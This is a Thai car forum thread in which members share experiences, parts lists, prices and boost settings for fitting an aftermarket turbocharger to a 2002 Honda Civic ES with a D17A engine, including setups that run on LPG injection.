ตอบ
kange


เข้าร่วม: 05 พฤศจิกา 2009
ตอบ: 13

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 5
ให้คำขอบคุณ: 0

ที่อยู่: อยุธยา
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 5 กันยา 2012 12:29 - ขอข้อมูล es ลง turbo
ขอข้อมูลเกี่ยวกับ es ลง turbo มีคัยลงแล้วบ้างคับ ราคาเท่าไร
แรงขึ้นเท่าไร
ขอรบกวนเพื่อนที่รู้ช่วยตอบด้วยคับ
ได้รับคำขอบคุณจาก: dangeroustoy 
alit


ชื่อเล่น: เอ

เข้าร่วม: 25 กันยา 2009
ตอบ: 659

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1446
ให้คำขอบคุณ: 1266

ที่อยู่: สุขุมวิท BTS อ่อนนุช
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 5 กันยา 2012 15:58 - ขอข้อมูล es ลง turbo
ผมก็สนใจจะลงอยู่เหมือนกัน เลยเก็บๆข้อมูลจากในนี้มาครับ หลายๆที่หลายๆคน ลองศึกษาดูครับ

prodrive
ขออนุญาติ เอาข้อความที่ คุณ อาท (artoasis) PM มาบอกผมเมื่อนานมาแล้วมาโพสท์บอกนะครับ สำหรับสเตปเทอร์โบ
ผมใช้ IHIB52 ครับ ของ subaru ครับ เวสเกตแยก ท่อเลส 2.5 บูส 0.4 bar ด้วยแก๊ส AC ครับ จูนเองครับ ให้ร้านเซ็ตโบให้ ไม่ยุ่งกับไส้ในเลยครับ
ผมใช้เกียร์ธรรมดา ครัชกับหวีก็ทำนิดหน่อยครับ ไม่แข็งมาก ขับใช้งานสบายครับ รันมาเกิน 100,000 โลแล้วครับ
เดี๋ยวผมขออนุญาติ copy ประโยคที่ผมเคยได้ตอบให้เพื่อนๆ ให้อ่านละกันนะครับ คือพิมพ์ไม่เก่งอ่ะครับ แล้วอะไรที่ไม่มี ผมจะพิมพ์เพิ่มเติมให้ครับ
------------------------------------------------------------------------------------
สวัสดีครับผม
ส่วนตัวผมเองนั้นรวมยอดทั้งหมดเท่าที่จำได้ประมาณ 35000 บาทครับ (ไม่รวมชุดกล่องนะครับเพราะผมใช้แก๊ส)
ซึ่งในราคานี้จะแยกออกเป็น
- ค่าอุปกรณ์ เทอร์โบ เวสเกต โบออฟ อินเตอร์ รวม 10,000 บาท (จะประหยัดก็ใช้เวสเกตกระป๋องเอาครับลดไปได้ 2500)
- ค่าอุปกรณ์เซ็ทโบอยู่ที่ไม่เกิน 25,000 บาท ซึ่งในส่วนตรงนี้คุณจะสามารถประหยัดได้เยอะเหมือนกันครับเดี๋ยวผมจะแจงสิ่ง ที่ผมได้จากราคานี้เป็นทีละข้อละกัน
- เขาเหล็ก (ที่ร้านแนะนำ) 4000 B
- ท่ออลูมิเนียมดัดทรายประมาณ 5000 B (ถ้าเอาเหล็กก็ถูกลงครึ่งๆแต่แนะนำให้ใช้อลูมิเนียมครับมันเบาจะได้ไม่หนักหน้า)
- ท่อเลสทั้งเส้น 2.5" 7000 B (ของผมถือว่าแพง ถ้าคุณใช้เหล็กประมาณ 2,000 B)
- ค่าข้อต่อยางต่างๆ turbotech 2,500 B (ใช้ยี่ห้อทั่วไปเช่น JBTECH ก็ได้ จะได้ถูกลง)
- ค่าอแดปเตอร์น้ำม้นเลี้ยงแกน+ค่าแรง+ค่าจิปะถะ ประมาณ 5,000 บาท
ส่วนในเรื่องกล่องจำเป็นต้องใช้ครับไม่งั้นบูสไม่เป็นเลยครับพังครับ แต่เพราะผมติดแก๊สระบบหัวฉีดจึงมีความสามารถรองรับระบบเทอร์โบได้ (MAP รองรับได้ 1.4 bar) ผมจูนเองครับ
ผมจึงใช้แก๊สตลอดครับ ควอเตอร์ไมล์ได้ 16.2วิ (ผมขับ) 15.6วิ (พี่ผมขับ) บูส 0.4 bar ครับ
มันแรงได้อีกครับแต่ต้องเปลี่ยนหม้อต้มเทพครับเพราะของเดิมไม่พอเหี่ยวปลาย
เช่นเดียวกันกับระบบน้ำม้นก็ต้องพ่วงกล่อง เปลี่ยนหัวฉีด เปลี่ยนปั๊มติ๊ก ครับถึงจะแรงแบบไม่หงุดหงิดครับ
ซึ่งคุณก็จะหมดหลายตังในส่วนนี้ครับ เอาแบบนี้ก็ได้คุณก็ไปใส่กล่องก่อนแล้วให้ช่างจูนเท่าที่ได้ก็ได้มีตังก็ ค่อยไปเพิ่มเอา(แต่ต้องจูนใหม่นะ)
จากที่สอบถามราคาที่สมเหตุสมผมและไม่วุ่นวายก็ ช่างTIP VSR TUNING SHOP สุขา3 ลองดูในRACING WEBครับ
FCON SZ ประมาณ 16000-18000 B เบร็จเสร็จเลยครับราคาเหมาเลย จบ ถ้าประหยัดก็ E-manage ก็ได้แต่เขาว่าชอบรวน
ถ้าใช้น้ำมันรับรองโครตแรง (ผมก็เก็บตังอยู่ครับ แฮ่ะๆ)
ผมไม่ยุ่งกับตัวเครื่องเลยครับรับได้ครับ (แต่อย่างเกิน 0.6 bar นะ) แต่ต้องระวังจำพวกยางซีลต่างๆครับอายุจะสั้นกว่าปกติเปลี่ยนได้ก็เปลี่ยน ครับ
ผมวิ่งมาได้ 100,000 โลแล้วครับเชื่อได้ว่าไม่พัง คำนวณแล้ว
Concept ผมสั่งช่างว่า ห้ามตัด เจาะ เว้า กับตัวถังทุกอย่าง เขาก็ทำให้ผมได้ครับ สามารถกลับสภาพเดิมได้ทุกอย่างครับ
เรื่องความประหยัดบอกได้เลยว่าประหยัดกว่าเดิมมากถ้าไม่บูส ซึ่งเราสามารถขับแบบปกติได้ถึง 120 km/hr ครับ
การที่เทอร์โบจะทำงานคือ ขับลากรอบ กระแทกคันเร่ง แซงรถคันหน้าโดยเหยียบส่งขี้เกียจเชนเกียร์ ถ้าบูสมาก็ตัวใครตัวมัน
แม้แต่แก๊สก็ยังไม่ประหยัดเลยครับ
ถ้าคุณมีงบจำกัดผมแนะนำ ไปเล่นกล่องพ่วง หรืออาจจะเพิ่มหัวฉีด ก็ได้ครับก็แรงเท่าๆกับผมเลยครับเผลอๆดีกว่าด้วย
ต้องเน้นใช้วิชาตัวเบาเป็นหลัก
แต่การต่อยอดก็จะมีข้อจำกัด ต่างจากรถผมคือถ้าผมมีตังพ่วงกล่อง เพิ่มหัวฉีด นี่ ดึงหน้าหงายเลยครับ

แต่ถ้าชอบเสน่ห์เทอร์โบ ก็จัดเลยครับ มันเท่ห์ครับ HONDA TURBO
ต่อนะครับ ที่ถามว่าอัตราเร่งเป็นอย่างไรต่างกันไหม ขอตอบครับว่า ต่างกันมากครับ คนละเรื่องเลยครับ 200km/hr แป๊ปเดียวครับ
นี่ขนาดใช้แก๊ส และไม่ได้ปลดรอบ ถ้าใช้น้ำมันและปลดรอบเชื่อได้ว่าดึงเอาการเหมือนกันครับ
เรื่องหม้อน้ำแนะนำให้เปลี่ยนครับเป็นแบบทองแดงทองเหลืองตามร้านหม้อน้ำทั่วไปครับ เอาแบบ2ช่อง 3000 นิดๆ อยู่เลยครับ
เรื่องเกียร์ออโต้นี่มีออยเกียร์ก็ดีครับช่วยได้เยอะ แต่ผมไม่แน่ใจกับเกียร์ออโต้ของ D17A ว่าจะทนได้แค่ไหนครับ
แรงม้ายังไม่เคยขึ้นทดสอบเลยครับ กะว่าจะใส่กล่องเพิ่มแล้วค่อยขึ้นวัดทีเดียวครับ แต่คงอีกนานครับเพราะตอนนี้ผมอยากได้ TEIN ครับ
ปล. อย่าลืมทำช่วงล่างด้วยนะครับ เบรกดีๆ จานหน้าใหญ่สักชุด ก็พอแล้วครับ

แต่ถ้าอยากกับเทอร์โบจริงๆ เอาแบบคุ้มๆเลยนะ

IHI B52 หรือ TD04L เวสเกตในตัวประมาณ 3000-4000 บาท
เขาเหล็ก 4000 บาท แสตนเลส 7500 บาท
ท่อไอเสีย 2.2" ขึ้นไป เหล็กไม่เกิน 2000 แสตนเลส 4000 บาทขึ้นไป (ของผมแพง 7500 บาท)
ท่ออลูมิเนียมดัดทราย+ท่อยาง ประมาณ 5000+ บาท ถ้าแบบเหล็กน่าจะถูกกว่าเท่าตัวแต่หนักน่าดู
อินเตอร์ SR ลูกเล็ก 500 บาท ลูกใหญ่โชว์หน้าได้ 2000 บาท(เซียงกง ม.หัวเฉียว) ถ้าอินเตอร์แต่งก็ 3500 บาทขึ้นไป
โบวออฟ ตามงบเลย ตั้งแต่ 1500-5000 บาท ไม่มีตังก็ไม่ต้องใส่ เสียงกรอเทอร์โบโหดดี
ค่า set up ท่อทางน้ำมันเข้าแกน ค่าฝีมือ 2000-3000 บาท

piggy back สักชุด + ค่าจูน ถูกสุดก็ 9000 บาท
(ถ้าไม่มี piggy back ยังไงก็บูสไม่ได้ หรือถ้าได้มันก็วิ่งสะดุดและพังเพราะน้ำมันจ่ายไม่พอ)

IHI B52 = SUBARU IMP & LEGACY
TD04L = 4G63 ฝากะปิตัวแรกๆ

Lee_ES_turbo
ผมตอบเป็นกลางๆนะคับ ระหว่างเซ็ตโบหรือ NA ดี แต่ยังไงก่อต้องรู้ตัวเองก่อนนะคับ ว่าชอบแรงนวไหน แรงแบบลากรอบมันส์ๆ หรือว่าแรงแบบดึกหนักๆ
ถ้าให้เปรียบเทียบกันง่ายๆ ถ้ามีงบ 100000 บาท(สมมตินะคับ) ทำแบบไหนจะมีแรงม้ามากกว่ากัน ผมจะบอกว่าเทอร์โบมากกว่า ต่อยอดได้มากกว่า กรณีที่อยากแรง ขยับได้เยอะ
ทำ NA เช่นเปิดฝามาเปิดพอร์ท ขัดลื่น ปาดฝา ลดประเก็น แคมซิ่งสเตท2 เฟืองแต่ง หัวฉีด กรองแต่ง เฮดสูตร จูนกล่อง จบก่อน่าจะราวๆ 60000+- ได้แรงม้าลงพื้นไม่เกิน 150 ตัว ข้อดีคือสามารถลากรอบได้นานกว่าเครื่องเดิมเซ๊ตโบ แต่ก่อไม่สามารถแช่นานได้ เพราะกำลังอัดที่สูงโดยใช้ลูกสูบเดิม ถ้าเปลี่ยนลูกสูบซิ่ง ก้านซิ่งด้วย ราคาก่อบวกไปปอีก 40000+- แรงม้าได้เพิ่มมาอีกเต็มที่ 20 ตัว แรงม้าที่ได้ก่อจะได้ราวๆ 170+- กับเครื่อง D17 ในสเต๊ปนี้ (กรณีปาดฝาต้องระวังเครื่องตัสร้อนด้วยนะคับ)
ทำ Turbo กับเครื่องเดิม โดยไม่เปิดฝา ง่ายๆ ก่อแค่ซื้อของที่ต้องใช้ เช่น เทอร์โบ โบออฟ อินเตอร์ เวสเกต หัวฉีด กรองอากาศแล้วเดินเข้าไปร้านท่อเลย บวกจูนกล่องราคาก่อจะอยู่ราวๆ 70000+- ได้แรงม้าราวๆ 200 ทันทีกับเครื่อง D17A VTEC MT (มีข้อมูลยืนยันว่าได้ 200 upจิงๆ บูส 0.6 บาร์) และถ้าอยากให้เครื่องเหนียวอีกหน่อย ก่อเปลี่ยนลูกก้านซิ่ง ราคาเท่ากับลูก NA แต่ต่างกันที่แรงม้าที่ได้รับทันที เพราะจะสามารถจัดบูสหนักได้ บูสดันไปเลย 1.2 บาร์ แรงม้าถีบตัวขึ้นไประดับ 270 ม้าได้เลย โดยที่อุปกรณือย่างอื่นไม่ต้องไปทำเพิ่มแล้ว
สนุกคนล่ะแบบคับ

อันนี้สำหรับเล่นกับแก๊ส
เลือกระบบแก๊สที่มีตาราง map จะดีมากเลยครับ ถ้า AC ก็ 300 plus ขึ้นไป มันจะจูนรอบต่อรอบได้เลยครับ map 3D ด้วย
ถ้าประหยัดลงมาอีกก็ AG ก็ได้ครับ ดีและถูกด้วย โปรแกรมมีตาราง map คล้าย E-manage ก็กดได้ไม่ยั้งเหมือนกัน
ถ้ามีงบแนะนำให้ใช้หม้อต้ม kme silver ก็ดีครับแรงดันไม่ตก ถ้าของ tomasetto ที่ให้มาก็พอรับได้ รอบปลายแรงดันจะตกต้องจูนเผื่อ
ถ้ามีแก๊สหัวฉีดแล้ว แล้วใช้แก๊สเป็นหลัก ส่วนตรงนี้ก็พอได้เลยครับ (จ่ายแก๊สพอหรือไม่พอเดี๋ยวค่อยเจาะรูขยายหัวฉีดเอา) ส่วนที่เป็น Hardware ทั้งหมดผมหมดไป 35000 บาทครับ ร้านแนะนำได้ครับแต่ไม่รู้เขาจะว่างทำให้หรือเปล่าครับ เริ่มแรกให้หา เทอร์โบ , เวสเกต , โบว์ออฟฯ , อินเตอร์ ตามที่ชอบก่อนเลยครับ นอกนั้นเดี๋ยวให้ร้านเขาทำให้ เทอร์โบ ใช้พวก IHI B52 , หรือ TD04L ครับ กำลังดี ราคาประมาณ 3200-4200 บาทแล้วแต่จังหวะและสภาพ เวสเกต ถ้าจะประหยัดงบก็ใช้เวสเกตที่ติดกับเทอร์โบมาก็ได้ครับ แต่แนะนำให้ใช้เวสเกตแยกดีกว่าครับ เสียงโหดด้วย อินเตอร์ฯ ตามความชอบเลยครับ ของที่บอกข้างต้น ราคาคร่าวๆประมาณ 10000-13000 บาทครับ นำไปหักลบกับราคารวมทั้งหมดข้างต้น ก็คือราคา SET เทอร์โบครับ ราคารวมไม่เกิน 40000 บาท (ขึ้นอยู่กับของที่เราหาเป็นหลักครับ เล่นของดีก็แพงขึ้นไปอีกครับ ก็มีเท่านี้ครับ จูนแก๊สใหม่วิ่งได้เลย แต่น้ำมันห้ามซัดนะเพราะกล่องน้ำมันจะไม่รับรู้แรงบูสครับ ขับปกติได้ครับ 120km/hr สบายๆ ถ้าขับแก๊ส อัดได้เลยครับ แรงไม่แรงอยู่ที่ฝีมือการจูนแล้วแหล่ะ บูสไม่เกิน 0.4bar ทนครับ แรงด้วย  ถ้าจะจุกจิกมันจะจุกจิกตรงซิลยาง สายไฟต่างๆครับ จะเสื่อม แข็งและกรอบเร็ว ดูให้ดี ผมทำที่ร้าน ธนวัฒน์เทอร์โบครับ อยู่ถนนนิมิตใหม่ ใกล้ปั๊มบางจากครับ หลักๆที่ได้มาคือ อลูมิเนียมดัดทราย+เชื่อมข้อ ท่อยาง Turbotech ไม่ได้ใช้ของ กระจอกๆนะ ท่อเลส 2.5" (จริงๆ 2" ก็พอนะ)
เขาเหล็กหนา (พี่เขาไม่แนะนำให้ใช้เลสเพราะแตกง่าย) ประมาณเนี้ย
ข้อดีคือ ทั้งคู่มาในรอบ 3000 ครับ VTEC เปิดพอดี ดึงๆกันไปเลย
แต่ B52 จะอยู่ยาวกว่าครับปลายยังไหลได้ แต่ TD04L รอบปลายจะหมดครับ อาจเป็นเพราะหน้าใบเล็กกว่าครับ
แต่ทั้งสอง ตอบโจทย์ได้ดีในเครื่องแบบเดิมๆครับ สามารถขับลอยๆได้โดยที่บูสไม่ทำงาน ได้ถึงความเร็ว 120km/hr ครับ ทำให้ประหยัดเชื้อเพลิง ถ้ากดส่งก็จะดึงทันที ก็จะกินเชื้อเพลิงทันทีครับ ประมาณว่าอารมณ์เหมือนรถเทอร์โบเดิมๆจากโรงงานครับ ขับสุนก ใช้ทนครับ มีอีกอันนึงครับคือรหัส TF05 พวก jazz ชอบใช้ครับ แต่ผมไม่รู้นิสัยมันครับ เดาว่า ต้นจัด ปลายเฉยๆ ครับ และบอกได้เลยครับ พวกเซ็ตโบ ขับธรรมดา ไม่เคยเป็นครับ กดตลอด หม้อน้ำเปลี่ยนใหม่ได้ก็ดีครับ ช่อง2 ขึ้นไป
อนนี้ใช้เกียร์อะไรอยู่ครับ แนะนำ เกียร์ธรรมดาก่อนครับ จะได้ทนๆ
เครื่องไม่พังหรอกครับ แต่เป็นห่วงเกียร์

แต่ ถ้าเป็นออโต้ก็ไม่เป็นไรก็พยายามดูแลให้ความสำคัญกับมันหน่อย มันก็ไม่ได้พังง่ายๆหรอกครับ
จริงๆแล้วมันก็แล้วแต่งบประมาณนะครับ ผมบอกเป็นหลักๆประหยัดล่ะกันเผื่ออยากลองทำกัน

สิ่งที่ต้องมี (คือหาเองดีกว่าจะได้ถูกๆ แต่ก็ต้องเป็นหน่อยๆ)

turbo = B52(SUBARU),TD04L,M24(SR20),ของCA18ก็ได้ หรือจะเอา เทอร์โบของ 1J,2J,RB26,ISUZU ก็ได้ (แนวหลังๆเริ่มออกแนวลูกทุ่งและ) ที่บอกมานี้มันอยู่ประมาณ 2800-4000 บาทตามสภาพ (ของผมใช้ B52 ครับ)
BLOW OFF VALVE = อันนี้ตามชอบเลยครับ มันก็ดีหมด ส่วนมากเน้นเสียง วิธีตรวจสอบว่ารั่วไม่รั่ว ก็ลองใช้ปากดูดตรงท่อแวคคัม แล้วให้มันดูดลิ้นหรือริมฝีปาก ถ้าดูดก็แสดงว่าดีไม่รั่ว แล้วก็สังเกตสภาพโดยรวม รอยลูกสูบ อะไรประมาณเนี้ย
เวสเกต = ก็แล้วแต่อีกเช่นกัน จะใช้ของเดิมที่ติดมาก็ได้แต่ก็ต้องเช็คหน่อยว่าบูสอยู่ที่เท่าไรเดี๋ยวเกิน
หรือจะใช้เวสเกตแยกก็ดี แซ้ดดี ปรับบูสได้ ฝาจีบก๊อปก็ได้ 2500 บาท (ตัดสินใจให้ดีว่าจะใช้แบบไหนเพราะมีผลต่อเนื่อง
กับการขึ้นเขาเทอร์โบ)
อินเตอร์ฯ = แล้วแต่กำลังทรัพย์ และความสวยที่คุณต้องการจะติดตั้ง จะแนวโหดหรือเรียบหรูก็เลือกเอา
เขาเทอร์โบ = เหล็กประมาณ 4000 บาท เลสประมาณ 7000 บาท
ท่อไอเสีย = 2.5 นิ้วทั้งเส้น เหล็กประมาณ 1500-2000 บาท เลสประมาณ 6500 ถึง 7500 บาท (ของผม 7500 แน่ะ)
ท่ออินเตอร์ฯ = เหมาๆ 4500-5500 บาท
ข้อต่อยาง TURBO TECH = อันละ 350-450 บาทแล้วแต่ขนาด ใช้ประมาณ 6 อัน
ชุดข้อต่อแยกน้ำมันเครื่อง+สายถักเข้าแกนเทอร์โบ = 1800 บาท
ค่าแรง = 1500-2500 บาท
กล่อง piggy back = อันนี้ก็แล้วแต่ครับเพราะผมยังไม่ได้ใส่ (ผมใช้แก๊สระบบหัวฉีดอยู่ครับ)
ถูกสุดก็น่าจะ E-MANAGE ครับ (เซ็ตโบเสร็จก่อนแล้วก็ไปหา TUNER เอาทีหลัง)
ใส้ใน = ของผมเดิมๆเลยครับ ผมบูสน้อยเลยยังไม่ได้ทำอะไรครับ ถ้าอยากทำก็เสริมประเก็นเอาครับ
สถานที่ทำก็ร้านเทอร์โบทั่วไปครับลองหาดู เราก็เข้าไปสอบถามราคาดู ลองเปรียบเทียบกับราคาที่ผมบอกข้างต้นดู
มันไม่น่าจะเกินไปกว่านี้ ถ้าเกินก็ให้เป็นค่าของที่เราอาจจะใช้ของที่ดีกว่า
________________________________________________________________________________________
เรื่องราคา - ในกรณีที่ติดแก๊ซหัวฉีดอยู่แล้ว งบประมาณ 23000 - 30000 บาท ขึ้นอยู่กับการหาอุปกรณ์กับร้านติดตั้งเทอร์โบครับ
แต่ ในกรณีที่ไม่ติดแก๊ซหัวฉีด อยู่ที่ประมาณ 55000 บาท ในกรณีที่วิ่งน้ำมันนะครับ เพราะต้องบวกค่ากล่อง f-Con ปั๊มติ๊ก เรคูเรเตอร์เข้าไปอีก

ทำไมวิ่งแก๊ซหัวฉีดจบกว่า - แก๊ซ LPG ให้ค่าออกเทนที่สูงกว่าน้ำมันอยู่แล้ว (ประมาณ 105) บวกกับอุปกรณ์ของแก๊ซหัวฉีดทั้งหมด สามารถปรับแต่งให้รองรับกับอัตราเชื้อเพลิงที่ต้องมีการจ่ายมากขึ้น้ได้ ยกตัวอย่าง ในกรณีแก๊ซหัวฉีด LPG คุณก็ไม่ต้องไปซื้อ ปั๊มติ๊ก เรคคูเรท และ กล่อง F-Con ถ้าในกรณีที่เชื้อเพลิงจ่ายไม่พอในเวลาที่เทอร์โบทำงาน คุณก็เจาะขยายหัวฉีดแก๊ซหรือเรียกว่า น๊อซเซิล ให้ใหญ่ขึ้น โดยใช้สว่านได้เอง และสามารถปรับแรงดันหม้อต้มแก๊ซให้สูงขึ้น เพื่อให้เหมาะสมกับกำลังอัดที่มากขึ้น จากนั้นก้สามารถซื้อสายจูนแก๊ซ และโปรแกรมการจูนของยี่ห้อนั้น มาลงใน Note Book ก็สามารถปรับการขยายรูหัวฉีดได้เอง เพียงแต่ข้อจำกัดของแก๊ซหัวฉีด คือไม่สามารถจูนอัตราการจุดระเบิดหรือเร่งไฟได้ เหมือน F-Con เท่านั้นเอง

เห็นไหมว่าการปรับแต่งต่างๆ สามารถทำได้เองอย่างโดยง่าย ถ้าคุณไม่ซีเรียสกับการจูนไฟให้แก่ขึ้น

ทำ แล้วแรงขึ้นไหม - ผมเป็นคนหนึ่งที่ Set turbo เครื่อง NA แต่ผมยังไม่เคยขึ้นวัดไดโน่ ผมจึงไม่มีตัวเลขมาพิสูจน์ได้ว่า แรงม้ามันขึ้นมาเท่าไหร
แต่อัตราเร่งแต่ละเกียร์ของผม ไวมากขึ้น อยู่ที่เกียร์ ละ 3 -4 วิ สุดที่รอบ 6000 เกียร์ 1-4 ความเร็วที่ 170 ผมใช้เวลาประมาณ 18-20 วินาที ที่บูส 8 PSI(พอๆกับ B16a ที่อยู่ใน 3 ดอร์) ผมว่าเท่านี้ก็คุ้มกับเงิน สองหมื่นกว่าบาทที่ลงทุนไปแล้ว ดีกว่าเสียเงินเป็นแสนลงเครื่องใหม่ แรงจริงแต่กินน้ำมัน อันนี้ก็ไม่ไหว แถมบางคนลงเครื่องใหม่ ขับไม่ไหว ก็ต้องขายรถ ราคาก็ตกอีก ผมเห็นเยอะแยะไป ต้องถามตัวคุณเองก่อนว่า เซทโบ เพื่อวิ่งแบบใช้ชีวิตประจำวัน หรือ จะเอาให้แรงวิ่งกับอีโว ถ้าแรงวิ่งกับอีโว ผมก็ไม่อยากแนะนำให้เซทครับ เพราะ เซทแล้วแรงม้าก็ไม่ถึง 200 แรงม้าอยู่แล้วครับ

ข้อดีของรถ NA Set Turbo - ปกติรถเทอร์โบ แรงอัดจะต่ำ เพื่อให้รองรับกับอัตราบูสเทอร์โบที่สูง แต่เครื่อง NA ของเรานั้นแรงอัดสูง จึงทำให้เล่นบูสได้น้อย
ดังนั้นในกรณีที่คุณวิ่ง ฝั่งแวคคั่ม หรือเรียกอีกอย่างว่าวิ่งแบบไม่ติดบูส รรถ NA Set Turbo จะมีอัตราเร่งที่ดีกว่ารถเทอร์โบ เนื่องจากแรงอัดสูงทำให้รถวิ่ง และบวกกับไอเสียที่เทอโบดูดเข้ามาช่วยเสริม จึงทำให้เวลาวิ่งแบบกึ่งแวคคั่มกึ่งบูส รถพุ่งออกไปได้ดี และประหยัดเชื้อเพลงกว่าเดิม แต่ในกรณีเครื่อง Turbo โรงงานในกรณีที่วิ่งฝั่งแวค จะทำให้อัตราเร่งไม่ดีนัก เนื่องจากกำลังอัดต่ำกว่ารถ NA จึงต้องอาศัยการทำงานของเทอร์โบควบคู่

เห็น ไหมครับ การเซทโบ ไม่ได้มีแต่ข้อเสีย ข้อดีก็มีนะครับ ทั้งนี้ อยู่ที่งคุณจะยึด  concept ใด ระหว่าง เซทโบเพื่ออัตราเร่งที่ดีขึ้นให้รถของเราเป็นรถบ้านที่วิ่งดีอัตราเร่งตอบ สนองทุกช่วงจังหวะ หรือ เซทเพื่อ แข่งกับรถเทอร์โบโรงงาน ถ้าคุณถือ Concept อันที่สอง ผมก็ไม่แนะนำให้ทำครับ เพราะเมื่อคุณทำแล้ว สู้เทอร์โบโรงงานไม่ได้ คุณก็จะหาวิธี ปรับบูศเพิ่ม ทำให้เครื่องทำงานหนักขึ้น เสียเงินมากขึ้น สุดท้ายเครื่องพัง แล้วคุณก็จะมาคิดย้อนหลังว่า โถ่ ที่ทำไปทั้งหมดลงเครื่องใหม่ดีกว่า นี่คือวิถีการแต่งรถของผู้ชายเราทุกคนครับ

ปล. การรับฟังการแสดงความคิดเห็นเป็นเรื่องที่ดีครับ แต่อยากให้พิจารณาจากประสพการณ์ของคนที่เคย Set เท่านั้น เพราะความเห็นส่วนมากอาจจะไม่เคยลอง set มาก่อน แต่ใช้หลักการ และทฤษฏี มาประกอบในการให้ความเห็นครับ การแต่งรถ ขอให้คุณรู้จักคำว่า พอใจกับสิ่งที่เราทำ รถของคุณก็จะอยู่กับคุณไปอีกนาน

บูส หรือที่เค้าเรียกว่าบูศมาเนี่ย สังเกตุไหมครับ รถเทอร์โบทุกคันจะต้องติดวัดบูส ลักษณะจะคล้ายๆ กับวัดรอบกลมๆ ซึ่งรถเทอร์โบหากไม่มีวัดบูส จะไม่สามารถรู้ได้เลยว่าแรงอัดที่เข้ามาในเครื่องนั้น มากแค่ไหน เกินกำลังเครื่องเราหรือไม่ แน่นอน มันจะอันตรายมากครับ สำหรับรถเทอร์โบที่ไม่มีวัดบูส โดยเทอร์โบจะมี เวสเกตเป็นตัวคุมบูส เพราะหาก มีความผิดพลาดเกิดขึ้นจากการดูดอากาศของเทอร์โบ หรือ ตัวเวสเกตทำงานผิดพลาด อาจจะเกิดอาการบูสไหลได้ครับ คำว่าบูสไหลหมายถึง เมื่อเราตั้งเวสเกตให้คุมบูสไว้ที่ 8 ปอร์น (เพื่อความปลอดภัยของเครื่อง) ถ้าเวสเกตไม่ดี มันจะไม่สามารถคุมแรงอัดไว้ได้ที่ 8 ปอร์น นั่นคือ บูสอาจจะไหล ไปที่ 10 - 13 ปอร์น เสียงต่อการทำให้เครื่องพังได้ครับ
เห็นไหมครับ ถ้าไม่มีวัดบูส เราจะไม่รู้เลยว่า อาการบูสไหลเกิดขึ้นกับเราหรือไม่

ซึ่ง เวลาที่เรากดคันเร่งจม ใบเทอร์โบจะปั่นอากาศจนเต็มจากนั้น เข็มวัดบูสก็จะตีขึ้นตามแรงอัดที่ถูกอัดเข้ามา นั่นก็คือถ้าเราเหยียบคนเร่งไม่จม เทอร์โบก้จะทำงานนิดเดียว อากาศก็จะไม่เต็มโข่งเทอร์โบ เข็มที่วัดบูสก็จะไม่ตีขึนไป นั่นคือที่เค้าเรียกว่าบูสไม่มา หรือเรียกอีกอย่างว่าวิ่งฝั่งแวคคคั่ม
สำหรับ ค่าความต่างระหว่าง PSI (ปอร์น)กับ BAR นั้น ผมก็ไม่สามารถจะเทียบได้ถูกต้องแน่ชัดนะครับ เอาเป็นว่า 1 BAR = 14.7 PSI (ปอร์น) ฉะนั้น 0.5 Bar = 7.3 PSI (ปอร์น)
สำหรับเทอร์โบที่เค้าเลือกใช้เวลาเซทเทอร์โบ ต้องขึ้นอยู่กับ CC รถคันนั้นๆด้วยครับ
ซึ่งมีให้เลือกเยอะแยะ โดยผมจะลองเอามาเขียนให้ดูคร่าวๆนะครับ

TD04H, TD04L, TD04HL - เป็นเทอร์โบที่ผลิดโดยมิซซูบิชิมอเตอร์ เป็นเทอร์โบแบบบูชนะครับ (มิซซูบิชิไม่นิยมผลิดเทอร์โบ ที่เป็นบอลแบริ่ง เนื่องจากไม่ทน จึงทำให้พวกรหัส TD ของมิซซูโด่งดัง เพราะว่ามันหาง่ายและทนมาก)ส่วนมาก รหัส 04 นี้จะเป็นเทอร์โบที่อยู่ในรถเครื่อง 2000 และ 1800
บูส Standard อยู่ที่ 0.6 หรือ 8 PSI โดยเราจะพบส่วนมากในรถ ซุบารูอิม(ตัวเก่า) จะเป็นรหัส 04L วอลโว่850 จะเป็นรหัส 04HL เครื่อง 4G93Tก็เป็น 04LหรือHนี่ผมไม่แน่ใจ แล้วก็เครื่อง 4g63RVR จะเป็น 04HLตัวที่ผมใช้อยู่ ซึ่งจิงๆมีรถอีกหลายรุ่นที่ใช้เทอร์โบลูกนี้แต่ผมได้ข้อมูลมาเท่านี้ครับ โดย TD04 ที่นิยมเพราะ จะมีโข่งหลังที่ค่อนช้างเล็กหน่อยเหมาะกับรถเครื่อง 1300-1600 ที่ต้องการเซ็ทเทอร์โบ เนื่องจากถ้าโข่งหลังเล็ก อากาศจะเต็มไว ทำให้บูสมาไวครับ

TD05 - เป็นเทอร์โบของรถพวก EVO 3-9 (หรือป่าว ถ้าผิดพลาดประการใดขออภัยด้วยครับ) ซึ่งเป็นเทอร์โบ ของเครื่อง 2000 เช่นเดียวกัน แต่ในกรณีที่จะนำมาเซทเทอร์โบกับรถ เครื่อง 1300-1600 จะไม่ค่อยเหมาะนักเนื่องจากมีโข่งหลังที่ใหญ่กว่า TD04 และบูส Standard อยู่ที่ 0.8 หรือ 12 PSI นับว่าค่อนข้างสูง จึงไม่นิยมลงกันใครเครื่อง 1300-1600 แต่ในกรณี เครื่อง 1800-2500 เทอร์โบตัวนี้นิยมมาก ในรถกระบะหรือรถ CC สูงๆเนื่องจากโข่งใบหน้าที่ใหญ่กว่าจึงทำให้ ตอบสอนความเร็วทั้งช่วงกลางและปลายได้ดี ผิดกับ 04 ซึ่งจะดีในช่วงความเร็วต้นและกลางเท่านั้น

IHI B52 - เป็นเทอร์โบของรถซูบารุอิมเพลสซ่าอีกเหมือนกัน แต่น่าจะเป็นเครื่องคอแดงนะครับ ขนาดโข่งหน้าใกล้เคียงกับ TD05 หรืออาจจะเล็กกว่านิดเดียว แต่ก็เป็นที่นิยมสำหรับเซ็ทเทอร์โบรถเครื่อง 1500-2000 นะครับ

